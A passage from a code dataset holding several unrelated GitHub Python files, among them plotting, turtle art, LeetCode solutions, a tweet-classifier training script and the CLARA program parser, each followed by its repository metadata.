'batang'\nplt.rcParams[\"font.size\"] = 20\nplt.rcParams[\"figure.figsize\"] = (14,4)\n\nloc = 'C:\\\\Users\\\\lane\\\\Desktop\\\\학위논문\\\\graph\\\\Original_epoch'\npath = os.listdir(loc)\naccuracy = []\n\nfor i in range(len(path)):\n path2_name = '%s%s%s' % (loc,'\\\\',path[i])\n path2 = os.listdir(path2_name)\n for j in range(len(path2)):\n path3 = '%s%s%s' % (path2_name,'\\\\',path2[j])\n CSV = pd.read_csv(path3)\n CSV_accuracy = CSV['Accuracy']\n accuracy.append(CSV_accuracy[0])\n 
#CSV_val_acc = CSV['val_acc']\n #CSV_loss = CSV['loss']\n #CSV_acc = CSV['acc']\n\n\n #print(CSV)\nDEN = accuracy[0:10]\nRES = accuracy[10:20]\nVGG = accuracy[20:30]\n\n\n\nplt.figure(figsize=(30,20))\n\na = 5\nb = 15\nplt.plot(DEN,'k-o',linewidth = a,markersize = b, label = 'Densenet-201')\nplt.plot(RES,'m-^', linewidth = a,markersize = b,label = 'Resnet-152V2')\nplt.plot(VGG,'y-s', linewidth = a,markersize = b,label = 'VGG19')\nplt.plot(1,0.68,markersize=30, c=\"b\", lw=5, ls=\"--\", marker=\"o\", mec=\"k\", mew=8, mfc=\"w\")\nplt.axis([-0.3,10,0,1])\n\nfor i in range(len(VGG)):\n number = str(VGG[i])\n plt.text(i,VGG[i]+0.01,s=number, fontsize=25)\nfor i in range(len(RES)):\n number = str(RES[i])\n plt.text(i,RES[i]+0.02,s=number, fontsize=25)\nfor i in range(len(DEN)):\n number = str(DEN[i])\n if i == 2:\n plt.text(i,DEN[i]+0.02,s=number, fontsize=25)\n else:\n plt.text(i,DEN[i]+0.02,s=number, fontsize=25)\n\nplt.tick_params(axis='x', labelsize=30)\nplt.xlabel('Epoch',fontsize=30)\nplt.xticks([0,1,2,3,4,5,6,7,8,9,10],\n [1,2,3,4,5,6,7,8,9,10])\n\nplt.tick_params(axis='y', labelsize=30)\nplt.ylabel('Prediction accuracy',fontsize=30)\nplt.grid()\nplt.legend(prop={'size': 30},loc='best')\nplt.show()\n#VGG = pd.read_csv('E:\\새 폴더\\graph\\original\\TL_DA_VGG19.csv')\n\n","repo_name":"HMCHON/shipblock-classification","sub_path":"3DCADDATAImageClassification-/graph_script/그래프그리기2.py","file_name":"그래프그리기2.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34698181235","text":"\"\"\"\nCreated on Thu Sep 15 11:39:56 2020\nPC04 start code\n@author: Logan Turner\n********* HEY, READ THIS FIRST **********\nThis is a description of the code that is written out below. This script draws\nflowers on a bush background, and the flowers change with each iteration of the code.\n\"\"\"\nimport turtle\nimport random\n\nturtle.colormode(255)\n# turtle.tracer(0) # uncomment this line to turn off turtle's animation. You must update the image yourself using panel.update() (line 42)\n\n# Create a panel to draw on. \npanel = turtle.Screen()\nw = 600 # width of panel\nh = 600 # height of panel\npanel.setup(width=w, height=h) #600 x 600 is a decent size to work on. \n#You can experiment by making \n\n# You must make 2 turtle variables\n# You must use 2 for loops (a nested for loop counts as 2!)\n# You must use at least 1 random element (something from the random library)\n# Don't forget to comment your code! (what does each for loop do? What does the random function you'll use do?)\n\n# =============== ADD YOUR CODE BELOW! 
=================\n\n#Establish variables\n#name our turtles\nstarStampTurtle = turtle.Turtle() #this is the turtle that draws star stamp flower\npolygonTurtle = turtle.Turtle() #this is the turtle that draws polygon flower\n\n#name color variables\nlavendarWeb = (220, 214, 247)\nmaximumBluePurple = (166, 177, 225)\nenglishLavendar = (180, 134, 159)\nroseDust = (152, 95, 111)\nindependence = (78, 76, 103)\n\n#create colors array\ncolors = [lavendarWeb, maximumBluePurple, englishLavendar, roseDust, independence]\n\n\n#draw background\npanel.bgcolor(5,140,66)\n\n#draw 4 octagon flowers\nfor i in range (4):\n polygonTurtle.penup()\n polygonTurtle.pensize(random.randint(1,7))\n polygonTurtle.speed(random.randint(3,10))\n polygonTurtle.goto(random.randint(-200, 200), random.randint(-150, 225))\n polygonTurtle.pendown()\n polygonTurtle.pencolor(colors[i])\n polygonTurtle.fillcolor(colors[-i])\n polygonTurtle.begin_fill()\n\n for i in range (9):\n polygonTurtle.forward(25)\n polygonTurtle.right(45)\n \n polygonTurtle.end_fill()\n\n#draw random number of star-shaped stamp flowers\nstarStampTurtle.shape(\"arrow\")\n\nfor i in range(random.randint(3,10)):\n starStampTurtle.penup()\n starStampTurtle.goto(random.randint(-270, 270), random.randint(-270,270))\n starStampTurtle.turtlesize(random.randint(2, 6))\n starStampTurtle.pencolor(random.choice(colors))\n starStampTurtle.fillcolor(random.choice(colors))\n starStampTurtle.pensize(random.randint(1,10))\n starStampTurtle.speed(random.randint(3,7))\n starStampTurtle.pendown()\n starStampTurtle.begin_fill()\n starStampTurtle.stamp()\n starStampTurtle.backward(1)\n starStampTurtle.left(180)\n starStampTurtle.stamp()\n for i in range (random.randint(5,25)):\n starStampTurtle.left(45)\n starStampTurtle.shape(\"triangle\")\n starStampTurtle.stamp()\n starStampTurtle.end_fill()\n \n# panel.update() # uncomment this if you've turned off animation (line 26). 
I recommend leaving this outside of loops, for now.\n# =================== CLEAN UP =========================\n# uncomment the line below when you are finished with your code (before you turn it in)\n\nturtle.done()","repo_name":"ATLS1300/pc04-generative-section12-logan-turner","sub_path":"PC04_GenArt.py","file_name":"PC04_GenArt.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"629697001","text":"import numpy as np\nimport sys\n\n\ndef func(d_max, d_dic):\n count = 1\n # print(d_dic)\n for d in range(d_max + 1):\n d_num = d_dic[d]\n # print(d, d_num)\n if d_num == 1:\n d_count = np.power(2, d)\n # print('dcount: ', d_count)\n else:\n d_count = np.math.factorial(2 * d_dic[d - 1]) / (\n np.math.factorial(d_num) * np.math.factorial(2 * d_dic[d - 1] - d_num))\n\n count = count * d_count\n\n return int(count % (np.power(10, 9) + 7))\n\n\n# d_max = 2\n# d_dic = {1: 1, 0: 1, 2: 2}\n\n# print(func(d_max, d_dic))\n\nif __name__ == \"__main__\":\n n = int(sys.stdin.readline().strip())\n ds = sys.stdin.readline().strip().split(' ')\n d_dic = {}\n d_max = 0\n for d in ds:\n d = int(d)\n if d > d_max:\n d_max = d\n if not d in d_dic.keys():\n d_dic[d] = 1\n else:\n d_dic[d] += 1\n\n print(func(d_max, d_dic))\n","repo_name":"yummyLee/CAPM-based-Learning","sub_path":"zyt/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27432593453","text":"# https://leetcode.cn/problems/path-sum-iii/\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# 二次递归 \nclass Solution: \n def rootSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n if root == None:\n return 0\n \n ans = 0\n if root.val == targetSum:\n ans += 1\n ans += self.rootSum(root.left, targetSum - root.val)\n ans += self.rootSum(root.right, targetSum - root.val)\n return ans\n \n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n if root == None:\n return 0\n ans = self.rootSum(root, targetSum)\n ans += self.pathSum(root.left, targetSum)\n ans += self.pathSum(root.right, targetSum)\n return ans\n\n\nclass Solution:\n def pathSum(self, root: TreeNode, targetSum: int) -> int:\n def rootSum(root, targetSum):\n if root is None:\n return 0\n\n ret = 0\n if root.val == targetSum:\n ret += 1\n\n ret += rootSum(root.left, targetSum - root.val)\n ret += rootSum(root.right, targetSum - root.val)\n return ret\n \n if root is None:\n return 0\n \n ret = rootSum(root, targetSum)\n ret += self.pathSum(root.left, targetSum)\n ret += self.pathSum(root.right, targetSum)\n return ret\n# 作者:LeetCode-Solution\n# 链接:https://leetcode.cn/problems/path-sum-iii/solution/lu-jing-zong-he-iii-by-leetcode-solution-z9td/\n# 来源:力扣(LeetCode)\n# 著作权归作者所有��商业转载请联系作者获得授权,非商业转载请注明出处。\n\n\n# 前缀和\nclass Solution:\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> int:\n prefix = collections.defaultdict(int)\n prefix[0] = 1\n \n def dfs(root, curr) -> int:\n if root == None:\n return 0\n \n ret = 0\n curr += root.val\n ret += prefix[curr - targetSum]\n prefix[curr] += 1\n ret += dfs(root.left, curr)\n ret += dfs(root.right, curr)\n prefix[curr] -= 1\n \n return ret\n \n return dfs(root, 0)\n \n \n \n \n 
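# note: the prefix-sum version above visits each node once (O(n)), while the two-level recursion can degrade to O(n^2) on skewed trees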
","repo_name":"chenzongyao200127/leetcode_in_rust","sub_path":"src/437_Path_Sum_III.py","file_name":"437_Path_Sum_III.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40345155763","text":"from tables.computed_values import ComputedValue;\nfrom tables.computed_values_types import ComputedValueType\nfrom tables.measurements import Measurements, Measurement;\nfrom tables.segments_properties import SegmentsProperties\nimport math;\n\nclass HillClimbingForce(ComputedValue):\n\n\n TYPE = \"Hill Climbing Force\";\n DESCRIPTION = \"Hill Climbing Force component of the Traction Force of the energy measurement\";\n UNITS = \"Newtons\";\n AGGREGATIONS = [];\n\n def __init__(self, id: int, measurement: Measurement, type: ComputedValueType, value: float, segment: int, direction: int):\n super().__init__(id, measurement, type, value, segment, direction);\n \n \n \n def calculate_value(self, measurement: Measurement):\n\n inclination_of_segment = SegmentsProperties().get_segment_property(\"Inclination\", measurement.segment.id)\n\n if inclination_of_segment != None:\n\n if(measurement.direction == 1):\n inclination_of_segment = inclination_of_segment * -1;\n\n return (1966 + 80) * math.sin(inclination_of_segment) * 9.81;\n\n return None;\n \n @staticmethod\n def prerequisites(measurement: Measurement):\n if measurement.type != 'obd.trac_cons':\n return False;\n else:\n return True;\n","repo_name":"sergidoce/LiRA-Visualization-Framework--Processing-Pipeline","sub_path":"pipeline/row_types/computed_values/HillClimbingForce.py","file_name":"HillClimbingForce.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43396519431","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120924\n\ndef solution(common):\n diff1 = common[1] - common[0]\n diff2 = common[2] - common[1]\n if diff1 == diff2: # 등차수열인지 확인\n answer = common[-1] + diff1\n else: # 등비수열\n if common[1] != 0: # 혹시 0의 이슈..\n div = common[1] / common[0]\n answer = common[-1] * div\n else: # 등비에서 0이 나오면 무조건 0\n answer = 0\n return answer","repo_name":"raunee/algorithm","sub_path":"Lv.0/day2_next_number.py","file_name":"day2_next_number.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"40398560326","text":"from sklearn.cross_validation import KFold\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression as logis\nfrom sklearn import preprocessing\nimport pickle\nimport numpy as np\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport sys\nsys.path.insert(0, 'Text_Retrieval')\nimport csv\n\nclassifier1 = \"randomforest\"\nclassifier2 = \"randomforest\"\n\ndef test():\n\n tweet_features = np.loadtxt('output/testset_tweet_features.dat', delimiter=',')\n eff_tweets = read_list('output/testset_eff_posts.dat')\n event_testset_details = '/Users/quoctin/Documents/UNITN - No Dropbox/MediaEVAL/ME2016_unitn/Text_Retrieval/dataset/testset/multimedia_details.csv'\n\n scaler_1 = None\n with open('output/RUN_1_scaler_1.pickle', 'rb') as handle:\n scaler_1 = pickle.load(handle)\n\n detector_1 = None\n with open('output/RUN_1_classifier_1.pickle', 'rb') as handle:\n detector_1 = pickle.load(handle)\n\n tweet_features = scaler_1.transform(tweet_features)\n\n tweet_pr = detector_1.predict(tweet_features)\n\n 
print('\\nResults of the 1st RUN \\n')\n print('Sum of real:', sum(tweet_pr == 1))\n for ind,p in enumerate(eff_tweets):\n print(p, '\\t', tweet_pr[ind])\n\n with open('first_run.txt', 'w') as csvfile:\n fieldnames = ['post_id', 'prediction', 'explanation']\n writer = csv.DictWriter(csvfile, delimiter = '\\t', fieldnames=fieldnames)\n writer.writeheader()\n for ind, p in enumerate(eff_tweets):\n label = 'fake'\n if tweet_pr[ind] == 1:\n label = 'real'\n writer.writerow({'post_id':p, 'prediction':label,\n 'explanation':''})\n\ndef train():\n\n #\n # load tweet featurese\n #\n\n tweet_features = np.loadtxt('output/devset_tweet_features.dat', delimiter=',')\n tweet_labels = np.array(tweet_features[:, -1], dtype=int)\n tweet_features = tweet_features[:, :-1]\n\n # make the training set balanced\n training_posts = read_list('dataset_for_training/real_tweet_id.data')\n training_posts.extend(read_list('dataset_for_training/fake_tweet_id.data'))\n all_posts = read_list('output/devset_eff_posts.dat')\n used_ind = np.ones((len(all_posts),), dtype=bool)\n\n for ind,p in enumerate(all_posts):\n if not p in training_posts:\n used_ind[ind] = False\n\n tweet_features = tweet_features[used_ind, :]\n tweet_labels = tweet_labels[used_ind]\n\n #\n # training classifier 1\n #\n\n detector = None\n if classifier1 == 'logis':\n detector = logis(C=1e5, solver='liblinear', multi_class='ovr')\n elif classifier1 == 'svm':\n detector = svm.SVC()\n elif classifier1 == 'randomforest':\n detector = ExtraTreesClassifier(n_estimators=200, max_depth=None,\n min_samples_split=1, random_state=0)\n\n scaler_1 = preprocessing.StandardScaler().fit(tweet_features)\n tweet_features = scaler_1.transform(tweet_features)\n detector.fit(tweet_features, tweet_labels)\n with open('output/RUN_1_classifier_1.pickle', 'wb') as handle:\n pickle.dump(detector, handle)\n with open('output/RUN_1_scaler_1.pickle', 'wb') as handle:\n pickle.dump(scaler_1, handle)\n\n print('Training statistics\\n')\n print('Number of real tweets: ', sum(tweet_labels == 1))\n print('Number of fake tweets: ', sum(tweet_labels == -1))\n\n\ndef read_list(file_name):\n l = []\n with open(file_name, 'r') as f:\n for line in f:\n line = line.strip('\\n\\t ')\n l.append(line)\n return l\n\ndef write_list(file_name, l):\n with open(file_name, 'w') as f:\n for e in l:\n f.write('{}\\n'.format(e))\n\ndef main():\n train()\n test()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"AlessandroBudroni/ME2016_unitn","sub_path":"RUN_1.py","file_name":"RUN_1.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24348729037","text":"a = [] # empty list\nb = [a] # list of one element with variable\nbig_list = [1,2,3,4,5] # 5 elements in a list\n\nyes_list = [1, \"a\"] # don't do this\n\nbig_list[0] # get the first element in the list\nprint(big_list[0]) # 1\nbig_list[4] # get the fith element\n\nprint(big_list[5]) # da error\n\nbig_list.append(-1) # [1,2,3,4,5,-1]\n# index, value\nbig_list.insert(3, 25) # [1, 2, 3, 25, 4, 5, -1]\n\n# big_list = big_list + [3] \nbig_list += [3]\n\n# [1,2,3,\"a\",\"b\",\"c\"]\nprint([1,2,3] + [\"a\", \"b\", \"c\"])\n# 0 1\nmatrix = [[4, 5, 6], [1, 2, 3]]\n\nprint(matrix[0][0]) # 4\n\ninner_list = matrix[1] # [1, 2, 3]\nprint(inner_list[2]) # 3\n\n\nnumber_of_grades = 5\ngrades = []\n\nfor i in range(number_of_grades):\n # pregunta la nota\n nota = 9 # asume que pedistes la nota\n grades.append(nota)\n\n# grades has 5 
elements\nprint(grades)\n\n# desde 5 hasta 20 brincando 2 cada vez\nfor i in range(5, 20, 2):\n print(i)\n\n\npares = [x + 1 for x in range(5, 100, 2)]\nprint(pares)","repo_name":"alqmy/The-Garage-Summer-Of-Code","sub_path":"day2/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32528176990","text":"'''\nCommon parser stuff\n'''\n\nimport re\n\n# clara lib imports\nfrom .common import UnknownLanguage\nfrom .model import Program, Function, Expr, Op, Var, Const, VAR_COND, VAR_RET\n\n\nclass NotSupported(Exception):\n '''\n Exception denoting that the code being parsed contains unsupported\n elements.\n '''\n\n def __init__(self, msg, line=None):\n self.line = line\n super(NotSupported, self).__init__(msg)\n\n \nclass ParseError(Exception):\n '''\n Exception denoting that the code cannot be parsed because syntax errors.\n '''\n\n def __init__(self, msg, line=None):\n super(ParseError, self).__init__(msg)\n\n\nclass Parser(object):\n '''\n Common stuff for parser for any language\n '''\n\n def __init__(self, optifs=True, postprocess=True, nobcs=False,\n slice=False):\n \n self.prog = Program()\n\n self.fncs = {}\n self.fncsl = []\n self.fnc = None\n self.loc = None\n\n self.optifs = optifs\n self.postproc = postprocess\n self.slice = slice\n\n self.loops = []\n\n self.cnt = 0\n\n self.warns = []\n\n self.hasbcs = False\n self.nobcs = nobcs\n\n def newcnt(self):\n self.cnt += 1\n return self.cnt\n\n def ssavar(self, var):\n return '%s_&%d&' % (var, self.newcnt())\n\n def addwarn(self, msg, *args):\n if args:\n msg %= args\n self.prog.addwarn(str(msg))\n\n def rmemptyfncs(self):\n '''\n Removes empty functions, i.e., declarations only\n '''\n\n for fnc in self.prog.getfncs():\n if fnc.initloc is None:\n self.prog.rmfnc(fnc.name)\n\n def rmunreachlocs(self, fnc):\n '''\n Removes unreachable locations from the graph\n '''\n\n visited = set()\n tovisit = [fnc.initloc]\n\n while len(tovisit) > 0:\n loc = tovisit.pop()\n if loc in visited:\n continue\n visited.add(loc)\n\n l1 = fnc.trans(loc, True)\n if l1:\n tovisit.append(l1)\n l2 = fnc.trans(loc, False)\n if l2:\n tovisit.append(l2)\n\n for loc in fnc.locs():\n if loc not in visited:\n fnc.rmloc(loc)\n\n def ssa(self, fnc):\n '''\n Converts exprs of each loc to SSA form\n '''\n\n for loc in fnc.locs():\n\n # Find last appearance of each var\n last = {}\n for i, (var, _) in enumerate(fnc.exprs(loc)):\n last[var] = i\n\n # Replace non-last appearance by a fresh var\n m = {}\n exprs = []\n for i, (var, expr) in enumerate(fnc.exprs(loc)):\n \n for v1, v2 in list(m.items()):\n expr = expr.replace(v1, Var(v2))\n\n if var == VAR_RET:\n newvar = var\n else:\n if last[var] > i:\n newvar = m[var] = self.ssavar(var)\n else:\n m.pop(var, None)\n newvar = var\n\n if var != newvar:\n expr.original = (var, self.cnt)\n\n exprs.append((newvar, expr))\n\n fnc.replaceexprs(loc, exprs)\n\n def rmtmp(self, fnc):\n '''\n Removes (merges) \"tmp\" or SSA-generated assignments\n '''\n\n for loc in fnc.locs():\n\n m = {}\n exprs = []\n primed = set([])\n lastret = None\n\n # Remember \"real\" vars and replace temps\n for var, expr in fnc.exprs(loc):\n\n #expr.statement = True\n \n expr.prime(primed)\n \n for v, e in list(m.items()):\n expr = expr.replace(v, e)\n\n if isinstance(expr, Op) and expr.name == 'ite':\n expr.args[0].original = None\n expr.args[1].original = None\n expr.args[2].original = None\n\n if var.endswith('&'):\n m[var] = 
expr\n\n else:\n if var == VAR_RET:\n lastret = len(exprs)\n \n exprs.append((var, expr))\n \n if var != VAR_RET:\n primed.add(var)\n\n # \"Merge\" return stmts\n nexprs = []\n retexpr = None\n retcond = None\n for i, (var, expr) in enumerate(exprs):\n if var == VAR_RET:\n tmpretcond = self.getretcond(expr)\n if tmpretcond is True or retcond is None:\n retcond = tmpretcond\n elif tmpretcond is not None and retcond is not True:\n retcond = Op(self.OROP, retcond, tmpretcond)\n if retexpr:\n retexpr = retexpr.replace(VAR_RET, expr)\n else:\n retexpr = expr\n\n if i == lastret:\n nexprs.append((var, retexpr))\n \n else:\n if retcond is True:\n continue\n elif retcond:\n expr = Op('ite', Op(self.NOTOP, retcond),\n expr, Var(var))\n nexprs.append((var, expr))\n\n fnc.replaceexprs(loc, nexprs)\n\n def getretcond(self, expr):\n if isinstance(expr, Op) and expr.name == 'ite':\n icond = expr.args[0]\n ct = self.getretcond(expr.args[1])\n cf = self.getretcond(expr.args[2])\n cond = []\n if ct is None and cf is None:\n return None\n if ct is True and cf is True:\n return True\n if ct:\n if ct is True:\n cond.append(icond.copy())\n else:\n cond.append(Op(self.ANDOP, icond.copy(), ct.copy()))\n if cf:\n nicond = Op(self.NOTOP, icond)\n if cf is True:\n cond.append(nicond.copy())\n else:\n cond.append(Op(self.ANDOP, nicond.copy(), cf.copy()))\n if len(cond) == 1:\n return cond[0]\n else:\n return Op(self.OROP, cond[0], cond[1])\n \n elif isinstance(expr, Var) and expr.name == VAR_RET:\n return None\n \n else:\n return True\n\n def postprocess(self):\n\n if not self.postproc:\n return\n\n self.rmemptyfncs()\n for fnc in list(self.prog.fncs.values()):\n self.rmunreachlocs(fnc)\n self.ssa(fnc)\n self.rmtmp(fnc)\n\n def visit(self, node, name=None):\n\n # Skip None-node\n if node is None:\n return\n\n # Name of the node class\n if name is None:\n name = node.__class__.__name__\n\n # Get method\n meth = getattr(self, 'visit_%s' % (name,), None)\n if meth is None:\n raise NotSupported(\"Unimplemented visitor: '%s'%s\" % (name,\n \" (%s)\" % node.value if hasattr(node, \"value\") else \"\"))\n\n # Call visitor method\n return meth(node)\n\n def visit_expr(self, node, allowlist=False, allownone=False):\n res = self.visit(node)\n\n if isinstance(res, list) and allowlist:\n ok = True\n for r in res:\n if not isinstance(r, Expr):\n ok = False\n break\n if ok:\n return res\n\n if res and not isinstance(res, Expr):\n raise ParseError(\"Expected expression, got '%s'\" % (res,),\n line=node.coord.line)\n\n if (not res) and (not allownone):\n if node:\n self.addwarn(\"Expression expected at line %s\" % (\n node.coord.line,))\n else:\n self.addwarn(\"Expression expected\")\n res = Const('?')\n\n return res\n\n def visit_if(self, node, cond, true, false):\n\n # Add condition (with new location)\n preloc = self.loc\n condloc = self.addloc('the condition of the if-statement at line %d' % (\n self.getline(cond)\n ))\n condexpr = self.visit_expr(cond, allowlist=True)\n if isinstance(condexpr, list):\n condexpr = self.expr_list_and(condexpr)\n self.addexpr(VAR_COND, condexpr)\n \n # Add true loc\n trueline = self.getline(true) or self.getline(node)\n trueloc = self.addloc('inside the if-branch starting at line %d' % (\n trueline))\n self.visit(true)\n afterloc1 = self.loc\n\n afterloc = self.addloc('after the if-statement beginning at line %s' % (\n self.getline(node)\n ))\n\n # Add (general) transitions\n self.addtrans(preloc, True, condloc)\n self.addtrans(condloc, True, trueloc)\n self.addtrans(afterloc1, True, 
afterloc)\n\n # Add false loc\n if false:\n falseloc = self.addloc('inside the else-branch starting at line %d' % (\n self.getline(false)))\n self.visit(false)\n afterloc2 = self.loc\n\n self.addtrans(condloc, False, falseloc)\n self.addtrans(afterloc2, True, afterloc)\n\n else:\n self.addtrans(condloc, False, afterloc)\n falseloc = None\n\n # \"Loop-less\" if-statement\n if trueloc == afterloc1 and ((not false) or falseloc == afterloc2):\n if self.optifs:\n self.optimizeif(preloc, condexpr, trueloc, falseloc)\n return\n\n self.loc = afterloc\n\n def optimizeif(self, preloc, condexpr, trueloc, falseloc):\n '''\n Optimized \"simple\" or \"loop-less\" if statement\n '''\n\n # Remove unneded part of the graph\n self.fnc.rmtrans(preloc, True)\n self.loc = preloc\n\n # Keep track of assigned vars\n varss = set()\n varsl = []\n mt = {}\n mf = {}\n\n # Add exprs from branches\n def addvars(loc, m):\n for (var, expr) in self.fnc.exprs(loc):\n newvar = self.ssavar(var)\n\n if var not in varss:\n varss.add(var)\n varsl.append(var)\n\n # Replace vars mapped so far\n for (v1, v2) in list(m.items()):\n expr = expr.replace(v1, Var(v2))\n expr.original = (var, self.cnt)\n self.addexpr(newvar, expr)\n\n # Remember replacement\n m[var] = newvar\n\n addvars(trueloc, mt)\n if falseloc is not None:\n addvars(falseloc, mf)\n\n # Add condition\n condvar = self.ssavar('$cond')\n self.addexpr(condvar, condexpr.copy())\n\n # Merge branches\n for var in varsl:\n self.addexpr(var, Op('ite', Var(condvar),\n Var(mt.get(var, var)), Var(mf.get(var, var))))\n\n def expr_list_and(self, exprs):\n\n if len(exprs) == 0:\n return None\n \n else:\n newexpr = exprs[0]\n for expr in exprs[1:]:\n newexpr = Op('&&', newexpr, expr, line=expr.line)\n return newexpr\n\n def visit_loop(self, node, init, cond, next, body, do, name, prebody=None):\n \n # Visit init stmts\n if init:\n self.visit(init)\n\n # Add condition (with new location)\n preloc = self.loc\n if isinstance(cond, Expr):\n condexpr = cond\n else:\n condexpr = self.visit_expr(cond, allowlist=True)\n if isinstance(condexpr, list):\n condexpr = self.expr_list_and(condexpr)\n \n if not condexpr:\n condexpr = Const('1')\n condloc = self.addloc(\"the condition of the '%s' loop at line %s\" % (\n name, condexpr.line or self.getline(node)))\n self.addexpr(VAR_COND, condexpr)\n\n # Add exit loc\n exitloc = self.addloc(\"*after* the '%s' loop starting at line %d\" % (\n name, self.getline(node)\n ))\n\n # Add next loc\n if next:\n nextloc = self.addloc(\"update of the '%s' loop at line %d\" % (\n name, self.getline(next)\n ))\n self.visit(next)\n else:\n nextloc = None\n\n # Add body with (new location)\n bodyloc = self.addloc(\"inside the body of the '%s' loop beginning at line %d\" % (\n name, self.getline(body) or self.getline(node)\n ))\n self.addloop((condloc, exitloc, nextloc))\n if prebody:\n for x in prebody:\n self.addexpr(*x)\n self.visit(body)\n self.poploop()\n afterloc = self.loc\n\n # Connect transitions\n self.addtrans(preloc, True, bodyloc if do else condloc)\n self.addtrans(condloc, True, bodyloc)\n self.addtrans(condloc, False, exitloc)\n if nextloc:\n self.addtrans(afterloc, True, nextloc)\n self.addtrans(nextloc, True, condloc)\n else:\n self.addtrans(afterloc, True, condloc)\n\n self.loc = exitloc\n\n def addfnc(self, name, params, rettype):\n if self.fnc:\n self.fncsl.append((self.fnc, self.loc))\n self.fnc = Function(name, params, rettype)\n self.fncs[name] = self.fnc\n self.prog.addfnc(self.fnc)\n\n def endfnc(self):\n if self.fncsl:\n self.fnc, self.loc = 
self.fncsl.pop()\n else:\n self.fnc = None\n self.loc = None\n\n def addloc(self, desc):\n assert (self.fnc), 'No active fnc!'\n self.loc = self.fnc.addloc(desc=desc)\n return self.loc\n\n def addexpr(self, name, expr, loc=None, idx=None):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n self.fnc.addexpr(loc, name, expr, idx=idx)\n\n def numexprs(self, loc=None):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n return self.fnc.numexprs(loc)\n\n def rmlastexprs(self, loc=None, num=1):\n assert (self.fnc), 'No active fnc!'\n if not loc:\n loc = self.loc\n self.fnc.rmlastexprs(loc, num)\n \n def addtrans(self, loc1, cond, loc2):\n assert (self.fnc), 'No active fnc!'\n self.fnc.addtrans(loc1, cond, loc2)\n\n def addtype(self, var, type, skiponexist=True):\n assert (self.fnc), 'No active fnc!'\n self.fnc.addtype(var, type, skiponexist)\n\n def hasvar(self, var):\n assert (self.fnc), 'No active fnc'\n return self.fnc.gettype(var) is not None\n\n def addloop(self, l):\n self.loops.append(l)\n\n def poploop(self):\n return self.loops.pop()\n\n def lastloop(self):\n return self.loops[-1] if len(self.loops) else None\n\n def isfncname(self, name):\n return name in self.fncs\n\n @classmethod\n def parse_code(cls, code, *args, **kwargs):\n parser = cls(*args, **kwargs)\n parser.parse(code)\n parser.postprocess()\n if parser.slice:\n parser.prog.slice()\n return parser.prog\n\n \nPARSERS = {}\n\n\ndef addlangparser(lang, parser):\n PARSERS[lang] = parser\n\n \ndef getlangparser(lang):\n if lang in PARSERS:\n return PARSERS[lang]\n raise UnknownLanguage(\"No parser for language: '%s'\" % (lang,))\n","repo_name":"iradicek/clara","sub_path":"clara/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":15640,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"13679099680","text":"def repeatedString(s, n):\n # Write your code here\n news=s\n res=[]\n if len(s)==1 and 'a' in s:\n return n\n else:\n while True:\n if len(news)n:\n news=news[:n]\n break\n elif len(news)==n:\n break\n \n for i in news:\n if i == 'a':\n res.append(i)\n \n return len(res)\n\nprint(repeatedString('kmretasscityylpdhuwjirnqimlkcgxubxmsxpypgzxtenweirknjtasxtvxemtwxuarabssvqdnktqadhyktagjxoanknhgilnm',736778906400))\n","repo_name":"arunvemireddy/Leet_Code","sub_path":"RepeatedString.py","file_name":"RepeatedString.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23257716148","text":"import os\nimport tkinter as tk\nfrom tkinter import PhotoImage\nimport subprocess\nimport threading\nimport time\nfrom multiprocessing import Process\n\nstatus = -1\nstart_t = time.time()\ntimest = 0 #0->left 1->right\nx0,y0,x1,y1 = 0,0,9,3\nclicking = 0\ntab = 